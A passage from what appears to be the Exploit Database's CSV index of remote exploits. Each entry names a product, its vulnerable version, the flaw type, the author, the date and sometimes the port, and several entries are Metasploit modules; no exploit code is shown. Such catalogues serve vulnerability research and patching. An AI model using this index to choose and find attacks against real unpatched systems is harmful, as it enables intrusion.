Device - Remote Code Execution (Metasploit)",2014-01-14,Metasploit,remote,hardware,32764 +30920,exploits/windows/remote/30920.html,"HP eSupportDiagnostics 1.0.11 - 'hpediag.dll' ActiveX Control Multiple Information Disclosure Vulnerabilities",2007-12-20,"Elazar Broad",remote,windows, +30928,exploits/php/remote/30928.php,"PDFlib 7.0.2 - Multiple Remote Buffer Overflow Vulnerabilities",2007-12-24,poplix,remote,php, +30933,exploits/multiple/remote/30933.php,"Zoom Player 3.30/5/6 - '.ZPL' Error Message Arbitrary Code Execution",2007-12-24,"Luigi Auriemma",remote,multiple, +30935,exploits/hardware/remote/30935.txt,"ZYXEL P-330W - Multiple Vulnerabilities",2007-12-25,santa_clause,remote,hardware, +30939,exploits/windows/remote/30939.txt,"ImgSvr 0.6.21 - Error Message Remote Script Execution",2007-12-26,anonymous,remote,windows, +30944,exploits/multiple/remote/30944.txt,"Feng 0.1.15 - Multiple Remote Buffer Overflow / Denial of Service Vulnerabilities",2007-12-27,"Luigi Auriemma",remote,multiple, +30998,exploits/linux/remote/30998.py,"SynCE 0.92 - 'vdccm' Daemon Remote Command Injection",2008-01-07,"Alfredo Ortega",remote,linux, +31010,exploits/multiple/remote/31010.sql,"Oracle Database 10 g - XML DB xdb.xdb_pitrig_pkg Package PITRIG_TRUNCATE Function Overflow",2008-01-10,sh2kerr,remote,multiple, +31013,exploits/hardware/remote/31013.txt,"2WIRE Routers - Cross-Site Request Forgery",2008-01-15,hkm,remote,hardware, +31023,exploits/windows/remote/31023.html,"Qvod Player 2.1.5 - 'QvodInsert.dll' ActiveX Control Remote Buffer Overflow",2008-01-11,anonymous,remote,windows, +31031,exploits/hardware/remote/31031.txt,"8E6 R3000 Internet Filter 2.0.5.33 - URI SecURIty Bypass",2008-01-16,nnposter,remote,hardware, +31032,exploits/windows/remote/31032.txt,"BitTorrent 6.0 / uTorrent 1.6/1.7 - Peers Window Remote Code Execution",2008-01-16,"Luigi Auriemma",remote,windows, +31033,exploits/hardware/remote/31033.py,"ASUS RT-N56U - Remote Buffer Overflow (ROP)",2014-01-19,"Jacob Holcomb",remote,hardware,80 +31039,exploits/windows/remote/31039.txt,"BitDefender Products - Update Server HTTP Daemon Directory Traversal",2008-01-19,"Oliver Karow",remote,windows, +31040,exploits/windows/remote/31040.html,"Toshiba Surveillance Surveillix DVR 'MeIpCamX.dll' 1.0 - ActiveX Control Buffer Overflow",2008-01-20,rgod,remote,windows, +31046,exploits/windows/remote/31046.cpp,"GlobalLink 'GLChat.ocx' 2.5.1 - ActiveX Control 'ChatRoom()' Remote Buffer Overflow",2008-01-09,Knell,remote,windows, +31047,exploits/multiple/remote/31047.txt,"Novemberborn sIFR 2.0.2/3 - 'txt' Cross-Site Scripting",2008-01-22,"Jan Fry",remote,multiple, +31050,exploits/multiple/remote/31050.php,"Firebird 2.0.3 Relational Database - 'protocol.cpp' XDR Protocol Remote Memory Corruption",2008-01-28,"Damian Frizza",remote,multiple, +31051,exploits/linux/remote/31051.txt,"Mozilla Firefox 2.0 - 'chrome://' URI JavaScript File Request Information Disclosure",2008-01-19,"Gerry Eisenhaur",remote,linux, +31052,exploits/linux/remote/31052.java,"Apache 2.2.6 mod_negotiation - HTML Injection / HTTP Response Splitting",2008-01-22,"Stefano Di Paola",remote,linux, +31053,exploits/php/remote/31053.php,"PHP 5.2.5 - cURL 'safe_mode' Security Bypass",2008-01-23,"Maksymilian Arciemowicz",remote,php, +31056,exploits/windows/remote/31056.py,"Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities",2008-01-23,"Felipe M. Aragon",remote,windows, +40358,exploits/linux/remote/40358.py,"LamaHub 0.0.6.2 - Remote Buffer Overflow",2016-09-09,Pi3rrot,remote,linux,4111 +31072,exploits/windows/remote/31072.html,"Symantec Backup Exec System Recovery Manager 7.0 - FileUpload Class Unauthorized File Upload",2007-01-05,titon,remote,windows, +31076,exploits/linux/remote/31076.py,"MPlayer 1.0rc2 - 'demux_mov.c' Remote Code Execution",2008-02-04,"Felipe Manzano",remote,linux, +31078,exploits/hardware/remote/31078.txt,"2WIRE Routers - 'H04_POST' Access Validation",2008-01-30,"Oligarchy Oligarchy",remote,hardware, +31095,exploits/novell/remote/31095.txt,"Novell Groupwise 5.57e/6.5.7/7.0 Webaccess - Multiple Cross-Site Scripting Vulnerabilities",2008-01-31,"Frederic Loudet",remote,novell, +31106,exploits/multiple/remote/31106.txt,"WinComLPD Total 3.0.2.623 - Remote Buffer Overflow / Authentication Bypass",2008-02-04,"Luigi Auriemma",remote,multiple, +31113,exploits/windows/remote/31113.html,"GlobalLink 2.6.1.2 - 'HanGamePlugincn18.dll' ActiveX Control Multiple Buffer Overflow Vulnerabilities",2008-02-05,anonymous,remote,windows, +31118,exploits/windows/remote/31118.c,"Microsoft Works 8.0 - File Converter Field Length Remote Code Execution",2008-02-06,"Luigi Auriemma",remote,windows, +31119,exploits/multiple/remote/31119.txt,"TinTin++ / WinTin++ 1.97.9 - '#chat' Multiple Vulnerabilities",2008-02-06,"Luigi Auriemma",remote,multiple, +31127,exploits/linux/remote/31127.txt,"Mozilla Firefox 2.0.9 - 'view-source:' Scheme Information Disclosure",2008-02-08,"Ronald van den Heetkamp",remote,linux, +31130,exploits/multiple/remote/31130.txt,"Apache Tomcat 6.0.15 - Cookie Quote Handling Remote Information Disclosure",2008-02-09,"John Kew",remote,multiple, +31132,exploits/hardware/remote/31132.txt,"Group Logic ExtremeZ-IP File and Print Servers 5.1.2 x15 - Multiple Vulnerabilities",2008-02-10,"Luigi Auriemma",remote,hardware, +31133,exploits/hardware/remote/31133.txt,"F5 BIG-IP 9.4.3 - Web Management Interface Cross-Site Request Forgery",2008-02-11,nnposter,remote,hardware, +31149,exploits/windows/remote/31149.txt,"Sentinel Protection Server 7.x/Keys Server 1.0.x - Backslash Directory Traversal",2008-02-11,"Luigi Auriemma",remote,windows, +31163,exploits/windows/remote/31163.txt,"WinIPDS 3.3 rev. G52-33-021 - Directory Traversal / Denial of Service",2008-02-12,"Luigi Auriemma",remote,windows, +40760,exploits/windows/remote/40760.rb,"Easy Internet Sharing Proxy Server 2.2 - Remote Overflow (SEH) (Metasploit)",2016-11-15,"Tracy Turben",remote,windows, +31683,exploits/hardware/remote/31683.php,"Linksys E-series - Unauthenticated Remote Code Execution",2014-02-16,Rew,remote,hardware, +31179,exploits/windows/remote/31179.html,"Daum Game 1.1.0.5 - ActiveX 'IconCreate Method' Remote Stack Buffer Overflow",2014-01-24,"Trustwave's SpiderLabs",remote,windows, +31181,exploits/windows/remote/31181.rb,"HP Data Protector - Backup Client Service Directory Traversal (Metasploit)",2014-01-24,Metasploit,remote,windows,5555 +31204,exploits/windows/remote/31204.txt,"Sophos Email Appliance 2.1 - Web Interface Multiple Cross-Site Scripting Vulnerabilities",2008-02-15,"Leon Juranic",remote,windows, +31231,exploits/windows/remote/31231.txt,"SIMM-Comm SCI Photo Chat 3.4.9 - Directory Traversal",2008-02-19,"Luigi Auriemma",remote,windows, +31253,exploits/jsp/remote/31253.rb,"Oracle Forms and Reports 11.1 - Arbitrary Code Execution",2014-01-29,Mekanismen,remote,jsp,80 +31254,exploits/windows/remote/31254.py,"PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",remote,windows,21 +31255,exploits/windows/remote/31255.py,"PCMan FTP Server 2.07 - 'CWD' Remote Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",remote,windows,21 +31462,exploits/linux/remote/31462.c,"Xine-Lib 1.1.11 - Multiple Heap Based Remote Buffer Overflow Vulnerabilities",2008-03-20,"Luigi Auriemma",remote,linux, +31260,exploits/windows/remote/31260.py,"haneWIN DNS Server 1.5.3 - Remote Buffer Overflow (SEH)",2014-01-29,"Dario Estrada",remote,windows,53 +31264,exploits/php/remote/31264.rb,"Simple E-document - Arbitrary File Upload (Metasploit)",2014-01-29,Metasploit,remote,php,80 +31279,exploits/multiple/remote/31279.txt,"IBM Lotus Quickr QuickPlace Server 8.0 - Calendar 'Count' Cross-Site Scripting",2008-02-21,"Nir Goldshlager AVNE",remote,multiple, +31298,exploits/hardware/remote/31298.txt,"Packeteer PacketShaper and PolicyCenter 8.2.2 - 'FILELIST' Cross-Site Scripting",2008-02-25,nnposter,remote,hardware, +31309,exploits/linux/remote/31309.c,"Ghostscript 8.0.1/8.15 - 'zseticcspace()' Remote Buffer Overflow",2008-02-27,"Will Drewry",remote,linux, +31311,exploits/hardware/remote/31311.txt,"Juniper Networks Secure Access 2000 - 'rdremediate.cgi' Cross-Site Scripting",2008-02-28,"Richard Brain",remote,hardware, +31340,exploits/hardware/remote/31340.html,"Check Point VPN-1 UTM Edge NGX 7.0.48x - Login Page Cross-Site Scripting",2008-03-06,"Henri Lindberg",remote,hardware, +31342,exploits/hardware/remote/31342.txt,"Airspan ProST WiMAX Device - Web Interface Authentication Bypass",2008-03-06,"Francis Lacoste-Cordeau",remote,hardware, +31345,exploits/windows/remote/31345.txt,"Microworld eScan Server 9.0.742 - Directory Traversal",2008-03-06,"Luigi Auriemma",remote,windows, +31359,exploits/windows/remote/31359.html,"Microsoft Internet Explorer 7 - Combined JavaScript and XML Remote Information Disclosure",2008-03-07,"Ronald van den Heetkamp",remote,windows, +31362,exploits/multiple/remote/31362.txt,"Neptune Web Server 3.0 - 404 Error Page Cross-Site Scripting",2008-03-07,NetJackal,remote,multiple, +31364,exploits/hardware/remote/31364.txt,"F5 BIG-IP 9.4.3 - Web Management Interface Console HTML Injection",2008-03-08,nnposter,remote,hardware, +31395,exploits/windows/remote/31395.txt,"Cisco User-Changeable Password (UCP) 3.3.4.12.5 - 'CSUserCGI.exe' Help Facility Cross-Site Scripting",2008-03-12,felix,remote,windows, +31396,exploits/linux/remote/31396.txt,"Lighttpd 1.4.x - mod_userdir Information Disclosure",2008-03-12,julien.cayzac,remote,linux, +31698,exploits/hardware/remote/31698.txt,"F5 Networks FirePass 4100 SSL VPN - 'installControl.php3' Cross-Site Scripting",2008-04-23,"Alberto Cuesta Partida",remote,hardware, +31699,exploits/windows/remote/31699.txt,"RSA Authentication Agent for Web 5.3 - Open Redirection",2008-04-23,"Richard Brain",remote,windows, +31405,exploits/windows/remote/31405.c,"XnView 1.92.1 - Command-Line Arguments Buffer Overflow",2014-02-05,"Sylvain THUAL",remote,windows, +31407,exploits/windows/remote/31407.txt,"MG-SOFT Net Inspector 6.5.0.826 - Multiple Remote Vulnerabilities",2008-03-17,"Luigi Auriemma",remote,windows, +31409,exploits/windows/remote/31409.txt,"BootManage TFTP Server 1.99 - 'Filename' Remote Buffer Overflow",2008-03-17,"Luigi Auriemma",remote,windows, +31412,exploits/osx/remote/31412.txt,"Apple Mac OSX Server 10.5 - Wiki Server Directory Traversal",2008-03-17,"Rodrigo Carvalho",remote,osx, +31432,exploits/linux/remote/31432.rb,"Skybluecanvas CMS - Remote Code Execution (Metasploit)",2014-02-05,Metasploit,remote,linux, +31433,exploits/multiple/remote/31433.rb,"Apache Tomcat Manager - Application Upload Authenticated Code Execution (Metasploit)",2014-02-05,Metasploit,remote,multiple,80 +31434,exploits/java/remote/31434.rb,"Apache Struts - Developer Mode OGNL Execution (Metasploit)",2014-02-05,Metasploit,remote,java,8080 +31473,exploits/osx/remote/31473.html,"Apple Safari 3.1 - Window.setTimeout Variant Content Spoofing",2008-03-22,"Juan Pablo Lopez Yacubian",remote,osx, +31474,exploits/windows/remote/31474.py,"Mitsubishi Electric GB-50A - Multiple Remote Authentication Bypass Vulnerabilities",2008-03-22,"Chris Withers",remote,windows, +31479,exploits/php/remote/31479.txt,"Quick Classifieds 1.0 - 'index.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,remote,php, +40354,exploits/android/remote/40354.txt,"Google Android - libutils UTF16 to UTF8 Conversion Heap Buffer Overflow",2016-09-08,"Google Security Research",remote,android, +31518,exploits/linux/remote/31518.rb,"Pandora Fms - Remote Code Execution (Metasploit)",2014-02-07,Metasploit,remote,linux,8023 +31519,exploits/hardware/remote/31519.rb,"Android Browser and WebView addJavascriptInterface - Code Execution (Metasploit)",2014-02-07,Metasploit,remote,hardware, +31533,exploits/novell/remote/31533.txt,"Novell eDirectory 8.x - eMBox Utility 'edirutil' Command",2008-03-25,"Nicholas Gregorie",remote,novell, +31534,exploits/windows/remote/31534.html,"LeadTools MultiMedia 15 - 'LTMM15.dll' ActiveX Control Arbitrary File Overwrite",2008-03-25,shinnai,remote,windows, +31536,exploits/windows/remote/31536.txt,"File Transfer 1.2 - Request File Directory Traversal",2007-11-10,teeed,remote,windows, +31540,exploits/linux/remote/31540.php,"PECL 3.0.x - Alternative PHP Cache Extension 'apc_search_paths()' Remote Buffer Overflow",2008-03-26,dannyp,remote,linux, +31551,exploits/multiple/remote/31551.txt,"Apache Tomcat 4.0.3 - Requests Containing MS-DOS Device Names Information Disclosure",2005-10-14,"security curmudgeon",remote,multiple, +31562,exploits/windows/remote/31562.txt,"2X ThinClientServer 5.0 sp1-r3497 TFTP Service - Directory Traversal",2008-03-29,"Luigi Auriemma",remote,windows, +31575,exploits/windows/remote/31575.rb,"KingScada - kxClientDownload.ocx ActiveX Remote Code Execution (Metasploit)",2014-02-11,Metasploit,remote,windows, +31577,exploits/unix/remote/31577.rb,"Kloxo - SQL Injection / Remote Code Execution (Metasploit)",2014-02-11,Metasploit,remote,unix,7778 +31583,exploits/windows/remote/31583.txt,"Microsoft Crypto API X.509 Certificate Validation - Remote Information Disclosure",2008-03-31,"Alexander Klink",remote,windows, +31591,exploits/linux/remote/31591.txt,"LANDesk Management Suite 8.80.1.1 - PXE TFTP Service Directory Traversal",2008-04-02,"Luigi Auriemma",remote,linux, +31613,exploits/osx/remote/31613.ics,"Apple iCal 3.0.1 - 'COUNT' Integer Overflow",2008-04-21,"Core Security Technologies",remote,osx, +31624,exploits/windows/remote/31624.txt,"Microsoft Internet Explorer 7 - Header Handling 'res://' Information Disclosure",2008-04-07,"The Hacker Webzine",remote,windows, +31630,exploits/linux/remote/31630.txt,"Adobe Flash Player 8/9.0.x - '.SWF' File 'DeclareFunction2' ActionScript Tag Remote Code Execution",2008-04-08,"Javier Vicente Vallejo",remote,linux, +31632,exploits/windows/remote/31632.txt,"Microsoft SharePoint Server 2.0 - Picture Source HTML Injection",2008-04-09,OneIdBeagl3,remote,windows, +31634,exploits/unix/remote/31634.py,"Python zlib Module - Remote Buffer Overflow",2008-04-09,"Justin Ferguson",remote,unix, +31638,exploits/windows/remote/31638.txt,"HP OpenView Network Node Manager (OV NNM) 7.x - 'OpenView5.exe?Action' Traversal Arbitrary File Access",2008-04-11,"Luigi Auriemma",remote,windows, +31639,exploits/php/remote/31639.txt,"Trillian 3.1.9 - '.DTD' File XML Parser Buffer Overflow",2008-04-11,david130490,remote,php, +31917,exploits/windows/remote/31917.rb,"Symantec Endpoint Protection Manager - Remote Command Execution (Metasploit)",2014-02-26,Metasploit,remote,windows,9090 +31689,exploits/windows/remote/31689.py,"HP Data Protector - EXEC_BAR Remote Command Execution",2014-02-16,"Chris Graham",remote,windows,5555 +31694,exploits/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow",2014-02-16,"Muhammad ELHarmeel",remote,windows, +31695,exploits/php/remote/31695.rb,"Dexter (CasinoLoader) - SQL Injection (Metasploit)",2014-02-16,Metasploit,remote,php, +31706,exploits/unix/remote/31706.txt,"IBM Lotus Expeditor 6.1 - URI Handler Command Execution",2008-04-24,"Thomas Pollet",remote,unix, +31736,exploits/windows/remote/31736.py,"Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow",2014-02-18,Sumit,remote,windows,80 +31737,exploits/windows/remote/31737.rb,"Oracle Forms and Reports - Remote Code Execution (Metasploit)",2014-02-18,Metasploit,remote,windows, +31756,exploits/multiple/remote/31756.txt,"SonicWALL Email Security 6.1.1 - Error Page Cross-Site Scripting",2008-05-08,"Deniz Cevik",remote,multiple, +31757,exploits/multiple/remote/31757.txt,"ZyWALL 100 HTTP Referer Header - Cross-Site Scripting",2008-05-08,"Deniz Cevik",remote,multiple, +31758,exploits/hardware/remote/31758.py,"WRT120N 1.0.0.7 - Remote Stack Overflow",2014-02-19,"Craig Heffner",remote,hardware,80 +31759,exploits/windows/remote/31759.txt,"Microsoft Internet Explorer 2 - UTF-7 HTTP Response Handling",2008-05-08,"Yaniv Miron",remote,windows, +31767,exploits/multiple/remote/31767.rb,"MediaWiki - 'Thumb.php' Remote Command Execution (Metasploit)",2014-02-19,Metasploit,remote,multiple,80 +31769,exploits/windows/remote/31769.html,"Ourgame 'GLIEDown2.dll' ActiveX Control - Remote Code Execution",2008-05-08,anonymous,remote,windows, +31770,exploits/multiple/remote/31770.txt,"Oracle Application Server Portal 10g - Authentication Bypass",2008-05-09,"Deniz Cevik",remote,multiple, +31788,exploits/windows/remote/31788.py,"VideoCharge Studio 2.12.3.685 - 'GetHttpResponse()' MITM Remote Code Execution",2014-02-20,"Julien Ahrens",remote,windows, +31789,exploits/windows/remote/31789.py,"PCMan FTP Server 2.07 - Remote Buffer Overflow",2014-02-20,Sumit,remote,windows,21 +31814,exploits/windows/remote/31814.py,"Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow",2014-02-22,"OJ Reeves",remote,windows, +31820,exploits/unix/remote/31820.pl,"IBM Lotus Sametime 8.0 - Multiplexer Buffer Overflow",2008-05-21,"Manuel Santamarina Suarez",remote,unix, +31828,exploits/hardware/remote/31828.txt,"Barracuda Spam Firewall 3.5.11 - 'ldap_test.cgi' Cross-Site Scripting",2008-05-22,"Information Risk Management Plc",remote,hardware, +31831,exploits/windows/remote/31831.py,"SolidWorks Workgroup PDM 2014 SP2 - Arbitrary File Write",2014-02-22,"Mohamed Shetta",remote,windows,30000 +31853,exploits/windows/remote/31853.py,"Symantec Endpoint Protection Manager 11.0/12.0/12.1 - Remote Command Execution",2014-02-23,"Chris Graham",remote,windows, +31862,exploits/hardware/remote/31862.txt,"Xerox DocuShare 6 - dsdn/dsweb/SearchResults URI Cross-Site Scripting",2008-05-29,Doz,remote,hardware, +31863,exploits/hardware/remote/31863.txt,"Xerox DocuShare 6 - dsdn/dsweb/Services/User URI Cross-Site Scripting",2008-05-29,Doz,remote,hardware, +31864,exploits/hardware/remote/31864.txt,"Xerox DocuShare 6 - docushare/dsweb/ServicesLib/Group URI Cross-Site Scripting",2008-05-29,Doz,remote,hardware, +31873,exploits/windows/remote/31873.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll ExtractCab' ActiveX Control Buffer Overflow",2008-06-03,"Dennis Rand",remote,windows, +31875,exploits/linux/remote/31875.py,"Python - 'socket.recvfrom_into()' Remote Buffer Overflow",2014-02-24,Sha0,remote,linux, +31885,exploits/hardware/remote/31885.txt,"F5 FirePass 6.0.2.3 - '/vdesk/admincon/webyfiers.php?css_exceptions' Cross-Site Scripting",2008-06-05,nnposter,remote,hardware, +31886,exploits/hardware/remote/31886.txt,"F5 FirePass 6.0.2.3 - '/vdesk/admincon/index.php?sql_matchscope' Cross-Site Scripting",2008-06-05,nnposter,remote,hardware, +31887,exploits/linux/remote/31887.txt,"ALFTP FTP Client 4.1/5.0 - 'LIST' Directory Traversal",2008-06-06,"Tan Chew Keong",remote,linux, +31890,exploits/multiple/remote/31890.txt,"Diigo Toolbar and Diigolet Comment Feature - HTML Injection / Information Disclosure",2008-06-20,"Ferruh Mavituna",remote,multiple, +31901,exploits/multiple/remote/31901.txt,"Sun GlassFish 2.1 - 'name' Cross-Site Scripting",2008-06-10,"Eduardo Neves",remote,multiple, +31903,exploits/linux/remote/31903.asm,"NASM 2.0 - 'ppscan()' Off-by-One Buffer Overflow",2008-06-21,"Philipp Thomas",remote,linux, +31909,exploits/windows/remote/31909.html,"XChat 2.8.7b - 'ircs://' URI Command Execution",2008-06-13,securfrog,remote,windows, +31912,exploits/multiple/remote/31912.txt,"GSC Client 1.00 2067 - Privilege Escalation",2008-06-14,"Michael Gray",remote,multiple, +31918,exploits/multiple/remote/31918.txt,"Crysis 1.21 - 'keyexchange' Packet Information Disclosure",2008-06-15,"Luigi Auriemma",remote,multiple, +31920,exploits/multiple/remote/31920.txt,"Glub Tech Secure FTP 2.5.15 - 'LIST' Directory Traversal",2008-06-13,"Tan Chew Keong",remote,multiple, +31921,exploits/multiple/remote/31921.txt,"3D-FTP 8.01 - 'LIST' / 'MLSD' Directory Traversal",2008-06-16,"Tan Chew Keong",remote,multiple, +31922,exploits/multiple/remote/31922.txt,"GlassFish Application Server - '/resourceNode/customResourceNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",remote,multiple, +31923,exploits/multiple/remote/31923.txt,"GlassFish Application Server - '/resourceNode/externalResourceNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",remote,multiple, +31924,exploits/multiple/remote/31924.txt,"GlassFish Application Server - '/resourceNode/jmsDestinationNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",remote,multiple, +31925,exploits/multiple/remote/31925.txt,"GlassFish Application Server - '/resourceNode/jmsConnectionNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",remote,multiple, +31926,exploits/multiple/remote/31926.txt,"GlassFish Application Server - '/resourceNode/jdbcResourceNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",remote,multiple, +31927,exploits/multiple/remote/31927.txt,"GlassFish Application Server - '/Applications/lifecycleModulesNew.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",remote,multiple, +31928,exploits/multiple/remote/31928.txt,"GlassFish Application Server - '/resourceNode/jdbcConnectionPoolNew1.jsf' Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,"Eduardo Jorge",remote,multiple, +31936,exploits/multiple/remote/31936.txt,"UltraEdit 14.00b - FTP/SFTP 'LIST' Directory Traversal",2008-06-17,"Tan Chew Keong",remote,multiple, +31941,exploits/multiple/remote/31941.txt,"WISE-FTP 4.1/5.5.8 - FTP Client 'LIST' Directory Traversal",2008-06-20,"Tan Chew Keong",remote,multiple, +31942,exploits/multiple/remote/31942.txt,"Classic FTP 1.02 - 'LIST' Directory Traversal",2008-06-20,"Tan Chew Keong",remote,multiple, +32048,exploits/osx/remote/32048.html,"Apple iPhone / Apple iPod Touch < 2.0 - Multiple Remote Vulnerabilities",2008-07-11,"Hiromitsu Takagi",remote,osx, +32133,exploits/linux/remote/32133.txt,"libxslt 1.1.x - RC4 Encryption and Decryption functions Buffer Overflow",2008-07-31,"Chris Evans",remote,linux, +31980,exploits/windows/remote/31980.html,"UUSee 2008 - UUUpgrade ActiveX Control 'Update' Method Arbitrary File Download",2008-06-26,Symantec,remote,windows, +31987,exploits/windows/remote/31987.rb,"GE Proficy CIMPLICITY - 'gefebt.exe' Remote Code Execution (Metasploit)",2014-02-28,Metasploit,remote,windows,80 +31996,exploits/windows/remote/31996.txt,"Microsoft Internet Explorer 7/8 Beta 1 - Frame Location Cross Domain Security Bypass",2008-06-27,"Eduardo Vela",remote,windows, +31997,exploits/windows/remote/31997.txt,"AceFTP 3.80.3 - 'LIST' Directory Traversal",2008-06-27,"Tan Chew Keong",remote,windows, +32012,exploits/linux/remote/32012.txt,"Netrw 125 Vim Script - Multiple Command Execution Vulnerabilities",2008-07-07,"Jan Minar",remote,linux, +32132,exploits/windows/remote/32132.py,"GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution",2014-03-09,"Julien Ahrens",remote,windows, +32049,exploits/windows/remote/32049.txt,"Microsoft Internet Explorer 6 - New ActiveX Object String Concatenation Memory Corruption",2008-07-14,0x000000,remote,windows, +32052,exploits/windows/remote/32052.html,"Sina DLoader Class - ActiveX Control 'DonwloadAndInstall' Method Arbitrary File Download",2008-07-14,Symantec,remote,windows, +32084,exploits/multiple/remote/32084.txt,"SmbClientParser 2.7 Perl Module - Remote Command Execution",2008-07-18,"Jesus Olmos Gonzalez",remote,multiple, +32110,exploits/multiple/remote/32110.txt,"Outpost Security Suite Pro 2009 - Filename Parsing Security Bypass",2008-07-22,"Juan Pablo Lopez Yacubian",remote,multiple, +32124,exploits/windows/remote/32124.txt,"Eyeball MessengerSDK 'CoVideoWindow.ocx' 5.0.907 - ActiveX Control Remote Buffer Overflow",2008-07-29,"Edi Strosar",remote,windows, +32129,exploits/windows/remote/32129.cpp,"BlazeVideo HDTV Player 3.5 - '.PLF' File Stack Buffer Overflow",2008-07-30,"fl0 fl0w",remote,windows, +32137,exploits/multiple/remote/32137.txt,"Apache Tomcat 6.0.16 - 'RequestDispatcher' Information Disclosure",2008-08-01,"Stefano Di Paola",remote,multiple, +32138,exploits/multiple/remote/32138.txt,"Apache Tomcat 6.0.16 - 'HttpServletResponse.sendError()' Cross-Site Scripting",2008-08-01,"Konstantin Kolinko",remote,multiple, +32163,exploits/windows/remote/32163.rb,"SolidWorks Workgroup PDM 2014 - 'pdmwService.exe' Arbitrary File Write (Metasploit)",2014-03-10,Metasploit,remote,windows,30000 +32164,exploits/windows/remote/32164.rb,"HP Data Protector - Backup Client Service Remote Code Execution (Metasploit)",2014-03-10,Metasploit,remote,windows,5555 +32165,exploits/linux/remote/32165.txt,"XAMPP Linux 1.6 - 'ming.php?text' Cross-Site Scripting",2008-08-04,"Khashayar Fereidani",remote,linux, +32166,exploits/linux/remote/32166.txt,"XAMPP Linux 1.6 - 'iart.php?text' Cross-Site Scripting",2008-08-04,"Khashayar Fereidani",remote,linux, +32167,exploits/multiple/remote/32167.txt,"8E6 Technologies R3000 - Host Header Internet Filter Security Bypass",2008-08-05,nnposter,remote,multiple, +32189,exploits/multiple/remote/32189.py,"DD-WRT - Site Survey SSID Script Injection",2008-08-06,"Rafael Dominguez Vega",remote,multiple, +32197,exploits/windows/remote/32197.pl,"Maxthon Browser 1.x - Content-Type Buffer Overflow",2008-08-09,DATA_SNIPER,remote,windows, +32209,exploits/windows/remote/32209.rb,"Yokogawa CENTUM CS 3000 - 'BKHOdeq.exe' Remote Buffer Overflow (Metasploit)",2014-03-12,Metasploit,remote,windows,20171 +32210,exploits/windows/remote/32210.rb,"Yokogawa CENTUM CS 3000 - 'BKBCopyD.exe' Remote Buffer Overflow (Metasploit)",2014-03-12,Metasploit,remote,windows,20111 +32223,exploits/multiple/remote/32223.rb,"Ruby 1.9 dl - Module DL.dlopen Arbitrary Library Access",2008-08-11,"Keita Yamaguchi",remote,multiple, +32224,exploits/multiple/remote/32224.rb,"Ruby 1.9 - Safe Level Multiple Function Restriction Bypass",2008-08-11,"Keita Yamaguchi",remote,multiple, +32225,exploits/linux/remote/32225.txt,"Vim - 'mch_expand_wildcards()' Heap Based Buffer Overflow",2005-01-29,"Brian Hirt",remote,linux, +32228,exploits/linux/remote/32228.xml,"Bugzilla 3.1.4 - '--attach_path' Directory Traversal",2008-08-12,"ilja van sprundel",remote,linux, +32286,exploits/linux/remote/32286.txt,"Fujitsu Web-Based Admin View 2.1.2 - Directory Traversal",2008-08-21,"Deniz Cevik",remote,linux, +32289,exploits/linux/remote/32289.txt,"Vim 7.1.314 - Insufficient Shell Escaping Multiple Command Execution Vulnerabilities",2008-08-19,"Ben Schmidt",remote,linux, +32301,exploits/windows/remote/32301.py,"Kyocera Mita Scanner File Utility 3.3.0.1 - File Transfer Directory Traversal",2008-08-26,"Seth Fogie",remote,windows, +32303,exploits/linux/remote/32303.txt,"Mono 2.0 - 'System.Web' HTTP Header Injection",2008-08-20,"Juraj Skripsky",remote,linux, +32336,exploits/hardware/remote/32336.txt,"D-Link DIR-100 1.12 - Security Bypass",2008-09-08,"Marc Ruef",remote,hardware, +32339,exploits/windows/remote/32339.txt,"Microsoft Organization Chart 2 - Remote Code Execution",2008-09-08,"Ivan Sanchez",remote,windows, +32344,exploits/windows/remote/32344.txt,"Microsoft Windows - Image Acquisition Logger ActiveX Control Arbitrary File Overwrite (1)",2008-09-08,Ciph3r,remote,windows, +32345,exploits/windows/remote/32345.cpp,"Microsoft Windows - Image Acquisition Logger ActiveX Control Arbitrary File Overwrite (2)",2008-09-08,Ciph3r,remote,windows, +32367,exploits/unix/remote/32367.rb,"Quantum vmPRO - Backdoor Command (Metasploit)",2014-03-19,Metasploit,remote,unix,22 +32359,exploits/php/remote/32359.txt,"SePortal 2.5 - SQL Injection (2)",2014-03-19,jsass,remote,php, +32363,exploits/multiple/remote/32363.txt,"Epic Games Unreal Engine 436 - Multiple Format String Vulnerabilities",2008-09-11,"Luigi Auriemma",remote,multiple, +32371,exploits/unix/remote/32371.txt,"Loadbalancer.org Enterprise VA 7.5.2 - Static SSH Key",2014-03-19,xistence,remote,unix, +32372,exploits/unix/remote/32372.txt,"Quantum DXi V1000 2.2.1 - Static SSH Key",2014-03-19,xistence,remote,unix,22 +32382,exploits/multiple/remote/32382.txt,"Accellion File Transfer Appliance Error Report Message - Open Email Relay",2008-09-15,"Eric Beaulieu",remote,multiple, +32426,exploits/windows/remote/32426.c,"DATAC RealWin SCADA Server 2.0 - Remote Stack Buffer Overflow",2008-09-26,"Ruben Santamarta",remote,windows, +32429,exploits/windows/remote/32429.html,"Novell ZENworks Desktop Management 6.5 - ActiveX Control 'CanUninstall()' Remote Buffer Overflow",2008-09-27,Satan_HackerS,remote,windows, +32438,exploits/windows/remote/32438.rb,"Microsoft Internet Explorer - TextRange Use-After-Free (MS14-012) (Metasploit)",2014-03-22,Metasploit,remote,windows, +32439,exploits/php/remote/32439.rb,"Horde Framework - Unserialize PHP Code Execution 